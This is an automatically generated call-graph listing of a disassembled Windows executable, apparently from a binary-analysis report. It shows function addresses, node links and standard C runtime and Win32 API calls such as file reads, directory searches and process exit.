f5e619 _free 14 API calls 17711->17714 17713 f6787a 17713->17674 17715 f6784f 17714->17715 17716 f63b33 __fread_nolock 25 API calls 17715->17716 17717 f6785a 17716->17717 17717->17674 17719 f6788f 17718->17719 17720 f678a9 17718->17720 17721 f5e619 _free 14 API calls 17719->17721 17722 f678b1 17720->17722 17723 f678c8 17720->17723 17726 f67894 17721->17726 17724 f5e619 _free 14 API calls 17722->17724 17725 f5c80e _mbstowcs 37 API calls 17723->17725 17727 f678b6 17724->17727 17732 f678d3 17725->17732 17728 f63b33 __fread_nolock 25 API calls 17726->17728 17729 f63b33 __fread_nolock 25 API calls 17727->17729 17731 f6789f 17728->17731 17729->17731 17730 f677f7 38 API calls 17730->17732 17731->17713 17732->17730 17732->17731 17734 f5ef43 17733->17734 17735 f5ef49 17734->17735 17743 f5ec41 17734->17743 17737 f596fa _ValidateLocalCookies 5 API calls 17735->17737 17738 f5e8d9 17737->17738 17738->17655 17738->17656 17744 f5e619 _free 14 API calls 17743->17744 17745 f5ec4d 17744->17745 17746 f5e619 _free 14 API calls 17745->17746 17747 f5ec54 17746->17747 17759 f5f3be 17747->17759 17750 f5e619 _free 14 API calls 17751 f5ec6f 17750->17751 17762 f5f235 17759->17762 17763 f5f245 17762->17763 17764 f5f2b1 17762->17764 17763->17764 17765 f5f24c 17763->17765 17800 f680bb 17764->17800 17767 f5f27c 17765->17767 17768 f5f259 17765->17768 17786 f5f1cc GetFullPathNameW 17767->17786 17776 f5f163 GetFullPathNameW 17768->17776 17774 f5e365 ___vcrt_freefls@4 14 API calls 17775 f5ec65 17774->17775 17775->17750 17777 f5f183 GetLastError 17776->17777 17778 f5f199 17776->17778 17780 f5e5e3 __dosmaperr 14 API calls 17777->17780 17779 f5f195 17778->17779 17803 f5f2e7 17778->17803 17779->17775 17782 f5f18f 17780->17782 17783 f5e619 _free 14 API calls 17782->17783 17783->17779 17787 f5f1ec GetLastError 17786->17787 17789 f5f202 17786->17789 17788 f5e5e3 __dosmaperr 14 API calls 17787->17788 17791 f5f1f8 17788->17791 17790 f5f1fe 17789->17790 17807 f5f30e 17789->17807 17796 f5f36c 17790->17796 17793 f5e619 _free 14 API calls 17791->17793 17793->17790 17797 f5f379 17796->17797 17799 f5f29c 17796->17799 17797->17799 17814 f5b9d8 17797->17814 17799->17774 17799->17775 17828 f67ee5 17800->17828 17804 f5f2f2 17803->17804 17805 f5e619 _free 14 API calls 17804->17805 17806 f5f1a7 17805->17806 17806->17779 17810 f5f2cd 17807->17810 17809 f5f31c 17811 f5f2e0 17810->17811 17812 f5f2d8 17810->17812 17811->17809 17813 f5e365 ___vcrt_freefls@4 14 API calls 17812->17813 17813->17811 17829 f67f17 17828->17829 17830 f67f03 17828->17830 17832 f67f56 17829->17832 17833 f67f1f 17829->17833 17831 f5e619 _free 14 API calls 17830->17831 17834 f67f08 17831->17834 17835 f676c8 21 API calls 17832->17835 17865 f6803f 17833->17865 17837 f63b33 __fread_nolock 25 API calls 17834->17837 17841 f67f5b 17835->17841 17863 f67f13 17837->17863 17844 f67ff6 17841->17844 17845 f67f8f 17841->17845 17843 f596fa _ValidateLocalCookies 5 API calls 17848 f6800a 17844->17848 17849 f67ffa 17844->17849 17850 f5f30e 14 API calls 17845->17850 17863->17843 17866 f68076 17865->17866 17867 f68059 17865->17867 17868 f6807f GetDriveTypeW 17866->17868 17869 f68074 17866->17869 17870 f5e606 __dosmaperr 14 API calls 17867->17870 17868->17869 17872 f596fa _ValidateLocalCookies 5 API calls 17869->17872 17871 f6805e 17870->17871 17935 f683f9 17940 f6818e 17935->17940 17938 f68438 17941 f681bc ___vcrt_FlsGetValue 17940->17941 17941->17941 17950 f6830c 17941->17950 17955 f6dcb4 17941->17955 17942 f5e619 _free 14 API calls 17943 f683e7 17942->17943 17944 f63b33 __fread_nolock 25 API calls 17943->17944 17945 f68317 17944->17945 17945->17938 17952 f6e800 17945->17952 17947 f68374 17948 f6dcb4 38 API calls 17947->17948 17947->17950 17949 f68392 17948->17949 17949->17950 17951 f6dcb4 38 API calls 17949->17951 17950->17942 17950->17945 17951->17950 17980 f6df09 17952->17980 17956 f6dcc2 17955->17956 17957 f6dce5 17955->17957 17956->17957 17958 f6dcc8 17956->17958 17965 f6dd00 17957->17965 17960 f5e619 _free 14 API calls 17958->17960 17962 f6dccd 17960->17962 17961 f6dcfb 17961->17947 17963 f63b33 __fread_nolock 25 API calls 17962->17963 17964 f6dcd8 17963->17964 17964->17947 17966 f6dd10 17965->17966 17967 f6dd2a 17965->17967 17968 f5e619 _free 14 API calls 17966->17968 17969 f6dd32 17967->17969 17970 f6dd4c 17967->17970 17971 f6dd15 17968->17971 17972 f5e619 _free 14 API calls 17969->17972 17975 f5c80e _mbstowcs 37 API calls 17970->17975 17977 f6dd20 17970->17977 17973 f63b33 __fread_nolock 25 API calls 17971->17973 17974 f6dd37 17972->17974 17973->17977 17976 f63b33 __fread_nolock 25 API calls 17974->17976 17979 f6dd63 17975->17979 17976->17977 17977->17961 17978 f677f7 38 API calls 17978->17979 17979->17977 17979->17978 17983 f6df15 ___scrt_is_nonwritable_in_current_image 17980->17983 17981 f6df1c 17982 f5e619 _free 14 API calls 17981->17982 17984 f6df21 17982->17984 17983->17981 17985 f6df47 17983->17985 17986 f63b33 __fread_nolock 25 API calls 17984->17986 17991 f6e4d6 17985->17991 17990 f6df2b 17986->17990 17990->17938 18042 f6e2b2 17991->18042 17994 f6e521 18059 f60904 17994->18059 17995 f6e508 17996 f5e606 __dosmaperr 14 API calls 17995->17996 17999 f6e50d 17996->17999 18003 f5e619 _free 14 API calls 17999->18003 18005 f6df6b 18003->18005 18038 f6df9e 18005->18038 18039 f6dfa4 18038->18039 18040 f6dfc8 18038->18040 18295 f608e1 LeaveCriticalSection 18039->18295 18040->17990 18043 f6e2d3 18042->18043 18044 f6e2ed 18042->18044 18043->18044 18047 f5e619 _free 14 API calls 18043->18047 18147 f6e242 18044->18147 18046 f6e325 18050 f6e354 18046->18050 18052 f5e619 _free 14 API calls 18046->18052 18048 f6e2e2 18047->18048 18049 f63b33 __fread_nolock 25 API calls 18048->18049 18049->18044 18057 f6e3a7 18050->18057 18154 f5f676 18050->18154 18054 f6e349 18052->18054 18053 f6e3a2 18056 f63b43 __wsopen_s 11 API calls 18053->18056 18053->18057 18055 f63b33 __fread_nolock 25 API calls 18054->18055 18055->18050 18058 f6e42b 18056->18058 18057->17994 18057->17995 18060 f60910 ___scrt_is_nonwritable_in_current_image 18059->18060 18161 f68793 EnterCriticalSection 18060->18161 18062 f6095e 18162 f60a0e 18062->18162 18063 f60917 18063->18062 18066 f609ab EnterCriticalSection 18063->18066 18067 f6093c 18063->18067 18066->18062 18068 f609b8 LeaveCriticalSection 18066->18068 18067->18062 18165 f6082c EnterCriticalSection 18067->18165 18068->18063 18150 f6e25a 18147->18150 18148 f6e275 18148->18046 18149 f5e619 _free 14 API calls 18151 f6e299 18149->18151 18150->18148 18150->18149 18152 f63b33 __fread_nolock 25 API calls 18151->18152 18153 f6e2a4 18152->18153 18153->18046 18155 f5f697 18154->18155 18156 f5f682 18154->18156 18155->18053 18157 f5e619 _free 14 API calls 18156->18157 18158 f5f687 18157->18158 18159 f63b33 __fread_nolock 25 API calls 18158->18159 18160 f5f692 18159->18160 18160->18053 18161->18063 18166 f687db LeaveCriticalSection 18162->18166 18165->18062 18295->18040 18351 f603e2 18352 f60417 18351->18352 18353 f60402 18351->18353 18352->18353 18355 f6041b FindFirstFileExW 18352->18355 18354 f5e619 _free 14 API calls 18353->18354 18358 f60407 18354->18358 18356 f60487 18355->18356 18357 f60438 GetLastError 18355->18357 18411 f60624 18356->18411 18359 f60454 18357->18359 18360 f60445 18357->18360 18362 f63b33 __fread_nolock 25 API calls 18358->18362 18365 f5e619 _free 14 API calls 18359->18365 18363 f6047e 18360->18363 18367 f60471 18360->18367 18368 f6044f 18360->18368 18378 f60412 18362->18378 18366 f5e619 _free 14 API calls 18363->18366 18365->18378 18366->18378 18372 f5e619 _free 14 API calls 18367->18372 18368->18359 18368->18363 18369 f60624 7 API calls 18370 f604ba 18369->18370 18373 f60624 7 API calls 18370->18373 18371 f596fa _ValidateLocalCookies 5 API calls 18374 f6046f 18371->18374 18372->18378 18375 f604cc 18373->18375 18376 f68911 25 API calls 18375->18376 18377 f604f0 18376->18377 18377->18378 18379 f604fe 18377->18379 18378->18371 18380 f63b43 __wsopen_s 11 API calls 18379->18380 18381 f60508 18380->18381 18382 f60529 18381->18382 18385 f60552 FindNextFileW 18381->18385 18383 f5e619 _free 14 API calls 18382->18383 18384 f6052e 18383->18384 18386 f63b33 __fread_nolock 25 API calls 18384->18386 18387 f60564 GetLastError 18385->18387 18388 f605a3 18385->18388 18389 f60539 18386->18389 18391 f60580 18387->18391 18392 f60571 18387->18392 18390 f60624 7 API calls 18388->18390 18396 f596fa _ValidateLocalCookies 5 API calls 18389->18396 18393 f605c4 18390->18393 18395 f5e619 _free 14 API calls 18391->18395 18394 f6059a 18392->18394 18399 f6058d 18392->18399 18400 f6057b 18392->18400 18398 f60624 7 API calls 18393->18398 18397 f5e619 _free 14 API calls 18394->18397 18395->18389 18402 f60547 18396->18402 18397->18389 18403 f605d6 18398->18403 18401 f5e619 _free 14 API calls 18399->18401 18400->18391 18400->18394 18401->18389 18404 f60624 7 API calls 18403->18404 18405 f605e8 18404->18405 18412 f60644 FileTimeToSystemTime 18411->18412 18413 f6063e 18411->18413 18414 f60653 SystemTimeToTzSpecificLocalTime 18412->18414 18415 f60667 18412->18415 18413->18412 18413->18415 18414->18415 18416 f596fa _ValidateLocalCookies 5 API calls 18415->18416 18417 f604a8 18416->18417 18417->18369 22395 f64d62 22396 f64d6e ___scrt_is_nonwritable_in_current_image 22395->22396 22407 f68793 EnterCriticalSection 22396->22407 22398 f64d75 22408 f6078e 22398->22408 22401 f64d93 22430 f64db9 22401->22430 22407->22398 22409 f6079a ___scrt_is_nonwritable_in_current_image 22408->22409 22410 f607c4 22409->22410 22411 f607a3 22409->22411 22433 f68793 EnterCriticalSection 22410->22433 22413 f5e619 _free 14 API calls 22411->22413 22414 f607a8 22413->22414 22415 f63b33 __fread_nolock 25 API calls 22414->22415 22416 f607b2 22415->22416 22416->22401 22419 f64bf8 GetStartupInfoW 22416->22419 22417 f607d0 22434 f60823 22417->22434 22420 f64c15 22419->22420 22421 f64ca9 22419->22421 22420->22421 22422 f6078e 25 API calls 22420->22422 22425 f64cae 22421->22425 22423 f64c3d 22422->22423 22423->22421 22424 f64c6d GetFileType 22423->22424 22424->22423 22427 f64cb5 22425->22427 22426 f64cf8 GetStdHandle 22426->22427 22427->22426 22428 f64d5e 22427->22428 22429 f64d0b GetFileType 22427->22429 22428->22401 22429->22427 22438 f687db LeaveCriticalSection 22430->22438 22432 f64da4 22433->22417 22437 f687db LeaveCriticalSection 22434->22437 22436 f6082a 22436->22416 22437->22436 22438->22432 21732 f5e4e0 21733 f5fbaa ___scrt_uninitialize_crt 66 API calls 21732->21733 21734 f5e4e8 21733->21734 21742 f67528 21734->21742 21736 f5e4ed 21737 f63ecc 14 API calls 21736->21737 21738 f5e4fc DeleteCriticalSection 21737->21738 21738->21736 21739 f5e517 21738->21739 21740 f63b77 _free 14 API calls 21739->21740 21741 f5e522 21740->21741 21743 f67534 ___scrt_is_nonwritable_in_current_image 21742->21743 21752 f68793 EnterCriticalSection 21743->21752 21745 f675ab 21753 f675ca 21745->21753 21746 f6753f 21746->21745 21748 f6757f DeleteCriticalSection 21746->21748 21750 f5b65c 67 API calls 21746->21750 21751 f63b77 _free 14 API calls 21748->21751 21750->21746 21751->21746 21752->21746 21756 f687db LeaveCriticalSection 21753->21756 21755 f675b7 21755->21736 21756->21755 17877 f61558 17878 f61564 ___scrt_is_nonwritable_in_current_image 17877->17878 17879 f61581 17878->17879 17880 f6156a 17878->17880 17890 f5e52c EnterCriticalSection 17879->17890 17881 f5e619 _free 14 API calls 17880->17881 17883 f6156f 17881->17883 17885 f63b33 __fread_nolock 25 API calls 17883->17885 17884 f61591 17891 f615d8 17884->17891 17889 f6157a 17885->17889 17887 f6159d 17912 f615ce 17887->17912 17890->17884 17892 f615e6 17891->17892 17893 f615fd 17891->17893 17894 f5e619 _free 14 API calls 17892->17894 17895 f62f81 __fread_nolock 25 API calls 17893->17895 17896 f615eb 17894->17896 17897 f61607 17895->17897 17898 f63b33 __fread_nolock 25 API calls 17896->17898 17900 f64bc2 29 API calls 17897->17900 17899 f615f6 17898->17899 17899->17887 17901 f61622 17900->17901 17902 f61695 17901->17902 17903 f616ea 17901->17903 17908 f6164c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17901->17908 17905 f616af 17902->17905 17907 f616c3 17902->17907 17904 f616f8 17903->17904 17903->17907 17906 f5e619 _free 14 API calls 17904->17906 17915 f61915 17905->17915 17906->17908 17907->17908 17927 f6175c 17907->17927 17908->17887 17934 f5e540 LeaveCriticalSection 17912->17934 17914 f615d6 17914->17889 17916 f61924 __wsopen_s 17915->17916 17917 f62f81 __fread_nolock 25 API calls 17916->17917 17919 f61937 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17917->17919 17918 f596fa _ValidateLocalCookies 5 API calls 17920 f616bb 17918->17920 17921 f64bc2 29 API calls 17919->17921 17926 f61943 17919->17926 17920->17908 17922 f61991 17921->17922 17923 f619c3 ReadFile 17922->17923 17922->17926 17924 f619ea 17923->17924 17923->17926 17925 f64bc2 29 API calls 17924->17925 17925->17926 17926->17918 17928 f62f81 __fread_nolock 25 API calls 17927->17928 17929 f6176f 17928->17929 17930 f64bc2 29 API calls 17929->17930 17933 f617b7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17929->17933 17931 f61807 17930->17931 17932 f64bc2 29 API calls 17931->17932 17931->17933 17932->17933 17933->17908 17934->17914 22471 f69342 22472 f6934e ___scrt_is_nonwritable_in_current_image 22471->22472 22479 f68793 EnterCriticalSection 22472->22479 22474 f69359 22480 f693a1 22474->22480 22479->22474 22481 f693c7 22480->22481 22482 f693b1 22480->22482 22485 f69422 22481->22485 22486 f693dd 22481->22486 22483 f5e619 _free 14 API calls 22482->22483 22484 f693b6 22483->22484 22487 f63b33 __fread_nolock 25 API calls 22484->22487 22488 f5e619 _free 14 API calls 22485->22488 22490 f692be 38 API calls 22486->22490 22492 f6936f 22487->22492 22489 f69427 22488->22489 22491 f63b33 __fread_nolock 25 API calls 22489->22491 22493 f693ee 22490->22493 22491->22492 22498 f69398 22492->22498 22493->22492 22494 f68911 25 API calls 22493->22494 22495 f6943d 22494->22495 22495->22492 22496 f63b43 __wsopen_s 11 API calls 22495->22496 22497 f69457 22496->22497 22501 f687db LeaveCriticalSection 22498->22501 22500 f69383 22501->22500 18418 f51740 18419 f51769 18418->18419 18420 f5175b 18418->18420 18424 f517cb 18419->18424 18464 f562c0 18419->18464 18490 f535c0 18420->18490 18426 f596fa _ValidateLocalCookies 5 API calls 18424->18426 18428 f517df 18426->18428 18429 f517e3 18476 f5b91e 18429->18476 18430 f517bc 18500 f521e0 18430->18500 18434 f5bd15 64 API calls 18435 f51877 18434->18435 18440 f518b0 18435->18440 18441 f51889 18435->18441 18436 f521e0 53 API calls 18437 f51809 18436->18437 18438 f596fa _ValidateLocalCookies 5 API calls 18437->18438 18439 f5181d 18438->18439 18443 f5b91e __fread_nolock 39 API calls 18440->18443 18442 f521e0 53 API calls 18441->18442 18444 f51898 18442->18444 18445 f518bd 18443->18445 18446 f596fa _ValidateLocalCookies 5 API calls 18444->18446 18447 f517fa 18445->18447 18448 f518cf 18445->18448 18447->18436 18465 f562da 18464->18465 18466 f5642a 18465->18466 18467 f5bd15 64 API calls 18465->18467 18468 f5e365 ___vcrt_freefls@4 14 API calls 18466->18468 18472 f562fb 18467->18472 18469 f5179d 18468->18469 18469->18424 18473 f5bd15 18469->18473 18470 f5bd15 64 API calls 18470->18472 18471 f5b91e __fread_nolock 39 API calls 18471->18472 18472->18466 18472->18470 18472->18471 18522 f5bad3 18473->18522 18561 f5b93b 18476->18561 18491 f535ca __wsopen_s 18490->18491 18661 f56990 18491->18661 18493 f535f7 18494 f56990 53 API calls 18493->18494 18495 f53604 18494->18495 18676 f5f492 18495->18676 18498 f596fa _ValidateLocalCookies 5 API calls 18499 f53625 18498->18499 18499->18419 18501 f5221c 18500->18501 18502 f5e312 44 API calls 18501->18502 18503 f5222a 18502->18503 18504 f5e619 _free 14 API calls 18503->18504 18505 f5222f 18504->18505 19086 f5e6a1 18505->19086 18508 f51a90 44 API calls 18524 f5badf ___scrt_is_nonwritable_in_current_image 18522->18524 18523 f5bae5 18526 f5e619 _free 14 API calls 18523->18526 18524->18523 18525 f5bb0b 18524->18525 18535 f5e52c EnterCriticalSection 18525->18535 18528 f5baea 18526->18528 18530 f63b33 __fread_nolock 25 API calls 18528->18530 18529 f5bb17 18536 f5bc37 18529->18536 18532 f517b5 18530->18532 18532->18429 18532->18430 18533 f5bb2b 18547 f5bb54 18533->18547 18535->18529 18537 f5bc5a 18536->18537 18538 f5bc4a 18536->18538 18550 f5bb5e 18537->18550 18540 f5e619 _free 14 API calls 18538->18540 18541 f5bc4f 18540->18541 18541->18533 18542 f5bd00 18542->18533 18543 f5bc7d 18543->18542 18554 f5fafd 18543->18554 18545 f64bdd __wsopen_s 27 API calls 18545->18542 18560 f5e540 LeaveCriticalSection 18547->18560 18549 f5bb5c 18549->18532 18551 f5bb6f 18550->18551 18552 f5bbc7 18550->18552 18551->18552 18553 f64bdd __wsopen_s 27 API calls 18551->18553 18552->18543 18553->18552 18555 f5fb15 18554->18555 18556 f5bca4 18554->18556 18555->18556 18557 f62f81 __fread_nolock 25 API calls 18555->18557 18556->18545 18558 f5fb33 18557->18558 18559 f65569 __wsopen_s 62 API calls 18558->18559 18559->18556 18560->18549 18563 f5b947 ___scrt_is_nonwritable_in_current_image 18561->18563 18562 f517f2 18562->18434 18562->18447 18563->18562 18564 f5b991 18563->18564 18565 f5b95a __fread_nolock 18563->18565 18574 f5e52c EnterCriticalSection 18564->18574 18567 f5e619 _free 14 API calls 18565->18567 18569 f5b974 18567->18569 18568 f5b99b 18575 f5b738 18568->18575 18571 f63b33 __fread_nolock 25 API calls 18569->18571 18571->18562 18574->18568 18579 f5b749 __fread_nolock 18575->18579 18587 f5b765 18575->18587 18576 f5b755 18577 f5e619 _free 14 API calls 18576->18577 18579->18576 18581 f5b7a7 __fread_nolock 18579->18581 18579->18587 18582 f5b8ce __fread_nolock 18581->18582 18583 f62f81 __fread_nolock 25 API calls 18581->18583 18584 f5b9d8 __fread_nolock 25 API calls 18581->18584 18586 f644f5 __fread_nolock 37 API calls 18581->18586 18581->18587 18583->18581 18584->18581 18586->18581 18588 f5b9d0 18587->18588 18662 f569f6 18661->18662 18663 f5699a MultiByteToWideChar 18661->18663 18664 f569fa MultiByteToWideChar 18662->18664 18665 f569b4 18663->18665 18670 f569cb 18663->18670 18666 f56a13 18664->18666 18667 f56a2a 18664->18667 18679 f52290 GetLastError 18665->18679 18671 f52290 51 API calls 18666->18671 18667->18493 18670->18664 18672 f569df 18670->18672 18673 f56a22 18671->18673 18674 f52290 51 API calls 18672->18674 18673->18493 18675 f569ee 18674->18675 18675->18493 19030 f5f3dc 18676->19030 18680 f522d5 18679->18680 18691 f5e312 18680->18691 18724 f5bfb2 18691->18724 18694 f565b0 18695 f565ba __wsopen_s 18694->18695 18696 f565d3 GetLastError 18695->18696 18697 f565d9 FormatMessageW 18695->18697 18696->18697 18698 f565fc 18697->18698 18699 f56628 18697->18699 18700 f52290 51 API calls 18698->18700 19015 f56a30 18699->19015 18702 f5660b 18700->18702 18704 f596fa _ValidateLocalCookies 5 API calls 18702->18704 18706 f56621 18704->18706 18725 f5bff2 18724->18725 18726 f5bfda 18724->18726 18725->18726 18728 f5bffa 18725->18728 18727 f5e619 _free 14 API calls 18726->18727 18729 f5bfdf 18727->18729 18730 f5c80e _mbstowcs 37 API calls 18728->18730 18731 f63b33 __fread_nolock 25 API calls 18729->18731 18733 f5c00a 18730->18733 18737 f5bfea 18731->18737 18732 f596fa _ValidateLocalCookies 5 API calls 18734 f522e3 18732->18734 18739 f5cb0f 18733->18739 18734->18694 18737->18732 18755 f5e044 18739->18755 18741 f5c091 18752 f5c891 18741->18752 18742 f5cb2f 18743 f5e619 _free 14 API calls 18742->18743 18744 f5cb34 18743->18744 18745 f63b33 __fread_nolock 25 API calls 18744->18745 18745->18741 18746 f5cb20 18746->18741 18746->18742 18762 f5cdb9 18746->18762 18770 f5d642 18746->18770 18775 f5cea0 18746->18775 18780 f5ceed 18746->18780 18809 f5d1b3 18746->18809 18753 f63b77 _free 14 API calls 18752->18753 18754 f5c8a1 18753->18754 18754->18737 18756 f5e05c 18755->18756 18757 f5e049 18755->18757 18756->18746 18758 f5e619 _free 14 API calls 18757->18758 18759 f5e04e 18758->18759 18760 f63b33 __fread_nolock 25 API calls 18759->18760 18761 f5e059 18760->18761 18761->18746 18831 f5cdf7 18762->18831 18764 f5cdbe 18771 f5d652 18770->18771 18772 f5d64b 18770->18772 18771->18746 18840 f5ca25 18772->18840 18776 f5ceb0 18775->18776 18777 f5cea9 18775->18777 18776->18746 18778 f5ca25 40 API calls 18777->18778 18779 f5ceaf 18778->18779 18779->18746 18781 f5cef4 18780->18781 18782 f5cf0e 18780->18782 18783 f5cf3e 18781->18783 18784 f5d1cc 18781->18784 18785 f5d238 18781->18785 18782->18783 18786 f5e619 _free 14 API calls 18782->18786 18783->18746 18797 f5d20f 18784->18797 18800 f5d1d8 18784->18800 18788 f5d23f 18785->18788 18789 f5d27e 18785->18789 18785->18797 18787 f5cf2a 18786->18787 18790 f63b33 __fread_nolock 25 API calls 18787->18790 18793 f5d1e6 18788->18793 18794 f5d244 18788->18794 18899 f5dee9 18789->18899 18791 f5cf35 18790->18791 18791->18746 18806 f5d1f4 18793->18806 18808 f5d208 18793->18808 18893 f5d7b0 18793->18893 18794->18797 18799 f5d249 18794->18799 18797->18806 18797->18808 18884 f5db91 18797->18884 18798 f5d21f 18798->18808 18870 f5da68 18798->18870 18800->18793 18800->18798 18800->18806 18806->18808 18902 f5e0e6 18806->18902 18808->18746 18810 f5d1cc 18809->18810 18811 f5d238 18809->18811 18819 f5d20f 18810->18819 18821 f5d1d8 18810->18821 18812 f5d23f 18811->18812 18813 f5d27e 18811->18813 18811->18819 18814 f5d244 18812->18814 18823 f5d1e6 18812->18823 18815 f5dee9 26 API calls 18813->18815 18818 f5d249 18814->18818 18814->18819 18828 f5d1f4 18815->18828 18816 f5db91 26 API calls 18816->18828 18817 f5d7b0 40 API calls 18817->18828 18822 f5d25c 18818->18822 18824 f5d24e 18818->18824 18819->18816 18819->18828 18830 f5d208 18819->18830 18820 f5d21f 18826 f5da68 39 API calls 18820->18826 18820->18830 18821->18820 18821->18823 18821->18828 18825 f5de37 25 API calls 18822->18825 18823->18817 18823->18828 18823->18830 18827 f5deab 26 API calls 18824->18827 18824->18830 18825->18828 18826->18828 18827->18828 18829 f5e0e6 39 API calls 18828->18829 18828->18830 18829->18830 18830->18746 18834 f5ce3c 18831->18834 18833 f5ce03 18833->18764 18835 f5ce5e _mbstowcs 18834->18835 18836 f5e619 _free 14 API calls 18835->18836 18839 f5ce95 18835->18839 18837 f5ce8a 18836->18837 18839->18833 18841 f5ca37 18840->18841 18842 f5ca3c 18840->18842 18843 f5e619 _free 14 API calls 18841->18843 18848 f65c0b 18842->18848 18843->18842 18849 f65c26 18848->18849 18885 f5dba4 18884->18885 18886 f5dbbf 18885->18886 18888 f5dbd6 18885->18888 18894 f5d7c9 18893->18894 18900 f5db91 26 API calls 18899->18900 18901 f5df00 18900->18901 18901->18806 19016 f56a98 19015->19016 19017 f56a3a WideCharToMultiByte 19015->19017 19018 f56a9c WideCharToMultiByte 19016->19018 19019 f56a56 19017->19019 19020 f56a6d 19017->19020 19021 f56ad0 19018->19021 19022 f56ab9 19018->19022 19023 f52290 51 API calls 19019->19023 19020->19018 19027 f56a81 19020->19027 19033 f5f3e8 ___scrt_is_nonwritable_in_current_image 19030->19033 19031 f5f3ef 19032 f5e619 _free 14 API calls 19031->19032 19034 f5f3f4 19032->19034 19033->19031 19035 f5f411 19033->19035 19036 f63b33 __fread_nolock 25 API calls 19034->19036 19037 f5f416 19035->19037 19038 f5f423 19035->19038 19041 f53613 19036->19041 19039 f5e619 _free 14 API calls 19037->19039 19047 f63d66 19038->19047 19039->19041 19041->18498 19048 f63d72 ___scrt_is_nonwritable_in_current_image 19047->19048 19059 f68793 EnterCriticalSection 19048->19059 19050 f63d80 19060 f63e0a 19050->19060 19059->19050 19069 f63e2d 19060->19069 19061 f63d8d 19073 f63dc6 19061->19073 19062 f63e85 19063 f67024 __dosmaperr 14 API calls 19062->19063 19064 f63e8e 19063->19064 19069->19061 19069->19062 19076 f5e52c EnterCriticalSection 19069->19076 19077 f5e540 LeaveCriticalSection 19069->19077 19084 f687db LeaveCriticalSection 19073->19084 19075 f5f42c 19076->19069 19077->19069 19084->19075 19088 f5e62c 19086->19088 19087 f663ab __dosmaperr 14 API calls 19087->19088 19088->19086 19088->19087 19089 f67024 __dosmaperr 14 API calls 19088->19089 19090 f63b77 _free 14 API calls 19088->19090 19092 f52236 19088->19092 19093 f63b43 __wsopen_s 11 API calls 19088->19093 19094 f67692 19088->19094 19089->19088 19090->19088 19092->18508 19093->19088 16503 f59935 16512 f5a032 GetModuleHandleW 16503->16512 16506 f59941 16508 f5994c 16506->16508 16514 f62849 16506->16514 16507 f59973 16517 f62867 16507->16517 16513 f5993d 16512->16513 16513->16506 16513->16507 16520 f62741 16514->16520 16518 f62741 _mbstowcs 23 API calls 16517->16518 16519 f5997b 16518->16519 16521 f62761 16520->16521 16522 f6274f 16520->16522 16538 f62607 16521->16538 16523 f5a032 _mbstowcs GetModuleHandleW 16522->16523 16525 f62754 16523->16525 16525->16521 16532 f627e7 GetModuleHandleExW 16525->16532 16527 f6279a 16527->16508 16533 f62806 GetProcAddress 16532->16533 16534 f62829 16532->16534 16537 f6281b 16533->16537 16535 f6282f FreeLibrary 16534->16535 16536 f62760 16534->16536 16535->16536 16536->16521 16537->16534 16539 f62613 ___scrt_is_nonwritable_in_current_image 16538->16539 16554 f68793 EnterCriticalSection 16539->16554 16541 f6261d 16555 f62654 16541->16555 16543 f6262a 16559 f62648 16543->16559 16546 f627a5 16615 f6a500 GetPEB 16546->16615 16549 f627d4 16552 f627e7 _mbstowcs 3 API calls 16549->16552 16550 f627b4 GetPEB 16550->16549 16551 f627c4 GetCurrentProcess TerminateProcess 16550->16551 16551->16549 16553 f627dc ExitProcess 16552->16553 16554->16541 16556 f62660 ___scrt_is_nonwritable_in_current_image 16555->16556 16558 f626c1 _mbstowcs 16556->16558 16562 f62cc6 16556->16562 16558->16543 16614 f687db LeaveCriticalSection 16559->16614 16561 f62636 16561->16527 16561->16546 16565 f629f7 16562->16565 16566 f62a03 ___scrt_is_nonwritable_in_current_image 16565->16566 16573 f68793 EnterCriticalSection 16566->16573 16568 f62a11 16574 f62bd6 16568->16574 16573->16568 16575 f62bf5 16574->16575 16576 f62a1e 16574->16576 16575->16576 16581 f63b77 16575->16581 16578 f62a46 16576->16578 16613 f687db LeaveCriticalSection 16578->16613 16580 f62a2f 16580->16558 16582 f63b82 RtlFreeHeap 16581->16582 16583 f63bab _free 16581->16583 16582->16583 16584 f63b97 16582->16584 16583->16576 16587 f5e619 16584->16587 16590 f663ab GetLastError 16587->16590 16591 f663c2 16590->16591 16592 f663c8 16590->16592 16613->16580 16614->16561 16616 f6a51a 16615->16616 16617 f627af 16615->16617 16619 f67233 16616->16619 16617->16549 16617->16550 16622 f671b0 16619->16622 16623 f671de 16622->16623 16628 f671da 16622->16628 16623->16628 16629 f670e9 16623->16629 16628->16617 16634 f670fa ___vcrt_FlsGetValue 16629->16634 21993 f695b4 22004 f6ec7a 21993->22004 21995 f695b9 ___scrt_is_nonwritable_in_current_image 22010 f68793 EnterCriticalSection 21995->22010 21997 f69638 22015 f69657 21997->22015 22001 f695d5 22001->21997 22003 f5b5e5 65 API calls 22001->22003 22011 f5e52c EnterCriticalSection 22001->22011 22012 f6962e 22001->22012 22003->22001 22005 f6ec95 22004->22005 22006 f63b77 _free 14 API calls 22005->22006 22007 f6eca8 22005->22007 22006->22005 22008 f63b77 _free 14 API calls 22007->22008 22009 f6ecd1 22007->22009 22008->22007 22009->21995 22010->22001 22011->22001 22018 f5e540 LeaveCriticalSection 22012->22018 22014 f69636 22014->22001 22019 f687db LeaveCriticalSection 22015->22019 22017 f69644 22018->22014 22019->22017 17339 f65835 17357 f62f81 17339->17357 17341 f65842 17342 f6584e 17341->17342 17343 f6586a 17341->17343 17344 f5e619 _free 14 API calls 17342->17344 17345 f65885 17343->17345 17346 f65878 17343->17346 17347 f65853 17344->17347 17352 f65898 17345->17352 17375 f659f1 17345->17375 17348 f5e619 _free 14 API calls 17346->17348 17348->17347 17352->17347 17356 f658fa 17352->17356 17383 f65a81 17352->17383 17364 f65925 17356->17364 17358 f62fa2 17357->17358 17359 f62f8d 17357->17359 17358->17341 17360 f5e619 _free 14 API calls 17359->17360 17361 f62f92 17360->17361 17362 f63b33 __fread_nolock 25 API calls 17361->17362 17363 f62f9d 17362->17363 17363->17341 17365 f62f81 __fread_nolock 25 API calls 17364->17365 17366 f65934 17365->17366 17367 f659d7 17366->17367 17368 f65947 17366->17368 17369 f65569 __wsopen_s 62 API calls 17367->17369 17370 f65964 17368->17370 17373 f65988 17368->17373 17372 f65908 17369->17372 17394 f65569 17370->17394 17373->17372 17419 f64bc2 17373->17419 17376 f65a07 17375->17376 17377 f65a0b 17375->17377 17376->17352 17378 f60aa8 